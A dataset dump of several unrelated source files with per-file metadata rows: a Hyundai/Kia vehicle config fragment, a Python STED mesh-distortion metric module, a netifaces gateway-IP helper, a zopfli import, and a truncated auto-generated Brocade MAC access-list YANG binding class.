"use_cluster_gears": [CAR.ELANTRA, CAR.KONA, CAR.ELANTRA_GT_I30], # Use Cluster for Gear Selection, rather than Transmission
"use_tcu_gears": [CAR.KIA_OPTIMA, CAR.SONATA_2019], # Use TCU Message for Gear Selection
"use_elect_gears": [CAR.KIA_OPTIMA_H, CAR.KONA_EV, CAR.GRANDEUR_H_19, CAR.GRANDEUR_H_20, CAR.IONIQ_EV, CAR.NIRO_HEV, CAR.NIRO_EV], # Use TCU Message for Gear Selection
}
EV_HYBRID = [CAR.KONA_EV,CAR.GRANDEUR_H_19, CAR.GRANDEUR_H_20, CAR.IONIQ_EV,CAR.NIRO_HEV, CAR.NIRO_EV]
DBC = {
CAR.ELANTRA: dbc_dict('hyundai_kia_generic', None),
CAR.ELANTRA_GT_I30: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G80: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G90: dbc_dict('hyundai_kia_generic', None),
CAR.HYUNDAI_GENESIS: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_FORTE: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA_H: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_SORENTO: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_STINGER: dbc_dict('hyundai_kia_generic', None),
CAR.KONA: dbc_dict('hyundai_kia_generic', None),
CAR.KONA_EV: dbc_dict('hyundai_kia_generic', None),
CAR.SANTA_FE: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA_2019: dbc_dict('hyundai_kia_generic', None),
CAR.PALISADE: dbc_dict('hyundai_kia_generic', None),
CAR.GRANDEUR_H_19: dbc_dict('hyundai_kia_generic', None),
CAR.GRANDEUR_H_20: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ_EV: dbc_dict('hyundai_kia_generic', None),
CAR.NIRO_HEV: dbc_dict('hyundai_kia_generic', None),
CAR.NIRO_EV: dbc_dict('hyundai_kia_generic', None),
}
STEER_THRESHOLD = 700
| 77.654822
| 505
| 0.575827
| 3,085
| 15,298
| 2.795462
| 0.076823
| 0.012523
| 0.021916
| 0.025046
| 0.752319
| 0.740608
| 0.72878
| 0.707908
| 0.658395
| 0.639842
| 0
| 0.496052
| 0.221859
| 15,298
| 196
| 506
| 78.05102
| 0.228411
| 0.011439
| 0
| 0.148936
| 0
| 0.014184
| 0.219908
| 0.025441
| 0
| 0
| 0.00477
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.276596
| 0.007092
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fb4ed96d5ab6b8c4272869f05af4df76886a92f1
| 6,297
|
py
|
Python
|
STED/sted_compute.py
|
QianyiWu/DR-Learning-for-3D-Face
|
fee8931e9bed5c1e3f69c290783fcaf4bcf967c9
|
[
"MIT"
] | 1
|
2019-12-24T12:39:24.000Z
|
2019-12-24T12:39:24.000Z
|
STED/sted_compute.py
|
QianyiWu/DR-Learning-for-3D-Face
|
fee8931e9bed5c1e3f69c290783fcaf4bcf967c9
|
[
"MIT"
] | null | null | null |
STED/sted_compute.py
|
QianyiWu/DR-Learning-for-3D-Face
|
fee8931e9bed5c1e3f69c290783fcaf4bcf967c9
|
[
"MIT"
] | null | null | null |
'''
This file include some functions for STED distance computation
'''
import numpy as np
import pickle
import math
import time
import openmesh as om
with open('edgelist.pkl', 'rb') as f:
edge_list = pickle.load(f)
with open('velist.pkl', 'rb') as f:
vertex_edge_list = pickle.load(f)
def sted_compute(src_point_array, tar_point_array):
'''
point_array: store the coordinate of point, size should be nver*3
-- src_point_array: source point array / origin mesh
-- tar_point_array: target point array / distorted mesh
'''
with open('edgelist.pkl', 'rb') as f:
edge_list = pickle.load(f)
src_el=[]
tar_el=[]
t = time.time()
# compute edge length of src_mesh and tar_mesh.
# This part should be accerated
src_el = np.array([np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))) for ele in edge_list])
tar_el = np.array([np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))) for ele in edge_list])
# for ele in edge_list:
# src_el.append(np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))))
# tar_el.append(np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))))
# src_el= np.array(src_el)
# tar_el= np.array(tar_el)
# print('edge time cost {}'.format(time.time()-t))
# compute relative edge difference, ed
ed = np.abs(src_el-tar_el)/src_el
# compute weights of edge
with open('velist.pkl', 'rb') as f:
vertex_edge_list = pickle.load(f)
dev=0
for ve in vertex_edge_list:
weight_array = src_el[ve]
sum_el = np.sum(weight_array)
weight_array = weight_array/sum_el
sub_ed_array = ed[ve]
avged = np.average(sub_ed_array, weights=weight_array)
vared = np.square(sub_ed_array-avged)
dev= dev+math.sqrt(np.average(vared, weights= weight_array))
return dev/src_point_array.shape[0]
def sted_compute_advanced_back(src_point_array, tar_point_array):
'''
point_array: store the coordinate of point, size should be nver*3
-- src_point_array: source point array / origin mesh
-- tar_point_array: target point array / distorted mesh
'''
# with open('edgelist.pkl', 'rb') as f:
# edge_list = pickle.load(f)
src_el=[]
tar_el=[]
# compute edge length of src_mesh and tar_mesh.
# This part should be accerated
src_el = np.array([np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))) for ele in edge_list])
tar_el = np.array([np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))) for ele in edge_list])
# for ele in edge_list:
# src_el.append(np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))))
# tar_el.append(np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))))
# src_el= np.array(src_el)
# tar_el= np.array(tar_el)
# print('edge time cost {}'.format(time.time()-t))
# compute relative edge difference, ed
ed = np.abs(src_el-tar_el)/src_el
# compute weights of edge
# with open('velist.pkl', 'rb') as f:
# vertex_edge_list = pickle.load(f)
dev=0
for ve in vertex_edge_list:
weight_array = src_el[ve]
sum_el = np.sum(weight_array)
weight_array = weight_array/sum_el
sub_ed_array = ed[ve]
avged = np.average(sub_ed_array, weights=weight_array)
vared = np.square(sub_ed_array-avged)
dev= dev+math.sqrt(np.average(vared, weights= weight_array))
return dev/src_point_array.shape[0]
def sted_compute_advanced(src_point_array, tar_point_array):
'''
point_array: store the coordinate of point, size should be nver*3
-- src_point_array: source point array / origin mesh
-- tar_point_array: target point array / distorted mesh
'''
# with open('edgelist.pkl', 'rb') as f:
# edge_list = pickle.load(f)
src_el=[]
tar_el=[]
# compute edge length of src_mesh and tar_mesh.
# This part should be accerated
src_el = np.array([np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))) for ele in edge_list])
tar_el = np.array([np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))) for ele in edge_list])
# for ele in edge_list:
# src_el.append(np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))))
# tar_el.append(np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))))
# src_el= np.array(src_el)
# tar_el= np.array(tar_el)
# print('edge time cost {}'.format(time.time()-t))
per_vertex_sted=[]
# compute relative edge difference, ed
ed = np.abs(src_el-tar_el)/src_el
# compute weights of edge
# with open('velist.pkl', 'rb') as f:
# vertex_edge_list = pickle.load(f)
dev=0
for ve in vertex_edge_list:
weight_array = src_el[ve]
sum_el = np.sum(weight_array)
weight_array = weight_array/sum_el
sub_ed_array = ed[ve]
avged = np.average(sub_ed_array, weights=weight_array)
vared = np.square(sub_ed_array-avged)
vertex_sted=math.sqrt(np.average(vared, weights= weight_array))
per_vertex_sted.append(vertex_sted)
#dev= dev+math.sqrt(np.average(vared, weights= weight_array))
dev= dev+vertex_sted
return dev/src_point_array.shape[0], per_vertex_sted
def cal_sted_loss_in_file(tar_file_format, src_file_format = '/raid/jzh/CVPR2019/alignpose/Tester_{}/AlignPose/pose_{}.obj',vis = False):
average_p_loss = []
for j in range(141,151):
for i in range(47):
tar_mesh = om.read_trimesh(tar_file_format.format(j,i))
src_mesh = om.read_trimesh(src_file_format.format(j,i))
src_point=src_mesh.points()
tar_point=tar_mesh.points()
p_loss, _ = sted_compute_advanced(src_point, tar_point)
#print(np.array(sted_array).astype(np.float64)[:3])
#np.savetxt((tar_file_format[:-4]+'.txt').format(j,i), sted_array)
average_p_loss.append(p_loss)
if vis:
print('people:{} exp: {}, STED {:9.6f}'.format(j, i, p_loss))
print('Average loss: {}'.format(np.mean(average_p_loss)))
print('median loss: {}'.format(np.median(average_p_loss)))
print('extreme differ: {}'.format(np.max(np.abs(np.array(average_p_loss) - np.mean(average_p_loss)))))
return average_p_loss
| 38.631902
| 137
| 0.686517
| 1,059
| 6,297
| 3.83475
| 0.11237
| 0.118197
| 0.076828
| 0.032504
| 0.817779
| 0.802265
| 0.791923
| 0.785028
| 0.775179
| 0.775179
| 0
| 0.009687
| 0.163888
| 6,297
| 162
| 138
| 38.87037
| 0.761633
| 0.386533
| 0
| 0.62963
| 0
| 0
| 0.05074
| 0.015856
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.061728
| 0
| 0.160494
| 0.049383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fb504188588e56e557bc9621aee77f8d39adb921
| 183
|
py
|
Python
|
network.py
|
jjbayer/kaast
|
801b9bfe278d87d4ed4a537229e42e635d036ab9
|
[
"MIT"
] | null | null | null |
network.py
|
jjbayer/kaast
|
801b9bfe278d87d4ed4a537229e42e635d036ab9
|
[
"MIT"
] | null | null | null |
network.py
|
jjbayer/kaast
|
801b9bfe278d87d4ed4a537229e42e635d036ab9
|
[
"MIT"
] | null | null | null |
import netifaces
def get_own_ip():
_, interface = netifaces.gateways()['default'][netifaces.AF_INET]
return netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr']
| 20.333333
| 73
| 0.73224
| 22
| 183
| 5.863636
| 0.681818
| 0.27907
| 0.232558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006211
| 0.120219
| 183
| 8
| 74
| 22.875
| 0.795031
| 0
| 0
| 0
| 0
| 0
| 0.060109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fb7c5cb40feb83c0ef7b26534d9a2e8b313b7b1a
| 21
|
py
|
Python
|
tools/zopfli/__init__.py
|
cahirwpz/ghostown-sushiboyz
|
aabbbeded37ad49e5055190009e6a4f79637d32c
|
[
"Artistic-2.0"
] | 2
|
2020-05-23T14:40:20.000Z
|
2020-05-26T20:36:23.000Z
|
tools/zopfli/__init__.py
|
cahirwpz/ghostown-sushiboyz
|
aabbbeded37ad49e5055190009e6a4f79637d32c
|
[
"Artistic-2.0"
] | null | null | null |
tools/zopfli/__init__.py
|
cahirwpz/ghostown-sushiboyz
|
aabbbeded37ad49e5055190009e6a4f79637d32c
|
[
"Artistic-2.0"
] | 1
|
2020-08-23T17:24:53.000Z
|
2020-08-23T17:24:53.000Z
|
from zopfli import *
| 10.5
| 20
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 21
| 1
| 21
| 21
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fbd9137ed54efee83562f600bf598eed4b23ff9c
| 28,588
|
py
|
Python
|
pybind/slxos/v17s_1_02/mac/access_list/standard/hide_mac_acl_std/seq/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/mac/access_list/standard/hide_mac_acl_std/seq/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/mac/access_list/standard/hide_mac_acl_std/seq/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class seq(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-mac-access-list - based on the path /mac/access-list/standard/hide-mac-acl-std/seq. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  # NOTE(review): generated Python 2 code -- it uses `unicode`, `long` and the
  # `__builtin__` module, so it will not import on Python 3 without porting.
  # Leaves of this container: seq-id (key), action, source, srchost,
  # src-mac-addr-mask, count, log, copy-sflow.
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__seq_id','__action','__source','__srchost','__src_mac_addr_mask','__count','__log','__copy_sflow',)
  _yang_name = 'seq'
  _rest_name = 'seq'
  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):
    # Resolve the XPath helper: an explicit kwarg wins, then the parent's
    # helper (when this object is attached to a parent), else disabled.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False
    # Resolve extmethods the same way: kwarg, then parent, else disabled.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False
    # Instantiate one YANGDynClass-wrapped default value per YANG leaf.
    self.__count = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
    self.__log = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
    self.__srchost = YANGDynClass(base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)
    self.__seq_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)
    self.__source = YANGDynClass(base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)
    self.__copy_sflow = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
    self.__src_mac_addr_mask = YANGDynClass(base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)
    self.__action = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)
    # Copy-constructor path: a single positional argument with matching
    # attributes has its changed leaves copied into this instance.
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
  def _path(self):
    # YANG path of this container; parent-relative when attached to a parent.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'mac', u'access-list', u'standard', u'hide-mac-acl-std', u'seq']
  def _rest_path(self):
    # REST path; note the standalone fallback omits the hidden
    # 'hide-mac-acl-std' node that appears in the YANG path.
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'mac', u'access-list', u'standard', u'seq']
  def _get_seq_id(self):
    """
    Getter method for seq_id, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/seq_id (uint64)
    """
    return self.__seq_id
  def _set_seq_id(self, v, load=False):
    """
    Setter method for seq_id, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/seq_id (uint64)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_seq_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_seq_id() directly.
    """
    # seq-id is the list key: once this entry lives inside an instantiated
    # list, the key may only be rewritten during a load, never directly.
    parent = getattr(self, "_parent", None)
    if parent is not None and load is False:
      raise AttributeError("Cannot set keys directly when" +
        " within an instantiated list")
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """seq_id must be of a type compatible with uint64""",
          'defined-type': "uint64",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)""",
        })
    self.__seq_id = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_seq_id(self):
    self.__seq_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)
  def _get_action(self):
    """
    Getter method for action, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/action (enumeration)
    """
    return self.__action
  def _set_action(self, v, load=False):
    """
    Setter method for action, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/action (enumeration)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_action is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_action() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """action must be of a type compatible with enumeration""",
          'defined-type': "brocade-mac-access-list:enumeration",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)""",
        })
    self.__action = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_action(self):
    self.__action = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)
  def _get_source(self):
    """
    Getter method for source, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/source (union)
    """
    return self.__source
  def _set_source(self, v, load=False):
    """
    Setter method for source, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/source (union)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_source is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_source() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """source must be of a type compatible with union""",
          'defined-type': "brocade-mac-access-list:union",
          'generated-type': """YANGDynClass(base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)""",
        })
    self.__source = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_source(self):
    self.__source = YANGDynClass(base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)
  def _get_srchost(self):
    """
    Getter method for srchost, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/srchost (mac-address-type)
    """
    return self.__srchost
  def _set_srchost(self, v, load=False):
    """
    Setter method for srchost, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/srchost (mac-address-type)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_srchost is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_srchost() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """srchost must be of a type compatible with mac-address-type""",
          'defined-type': "brocade-mac-access-list:mac-address-type",
          'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)""",
        })
    self.__srchost = t
    if hasattr(self, '_set'):
      self._set()
  def _unset_srchost(self):
    self.__srchost = YANGDynClass(base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)
  def _get_src_mac_addr_mask(self):
    """
    Getter method for src_mac_addr_mask, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/src_mac_addr_mask (src-dst-mac-address-mask-type)
    """
    return self.__src_mac_addr_mask
  def _set_src_mac_addr_mask(self, v, load=False):
    """
    Setter method for src_mac_addr_mask, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/src_mac_addr_mask (src-dst-mac-address-mask-type)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_src_mac_addr_mask is considered as a private
    method. Backends looking to populate this variable should
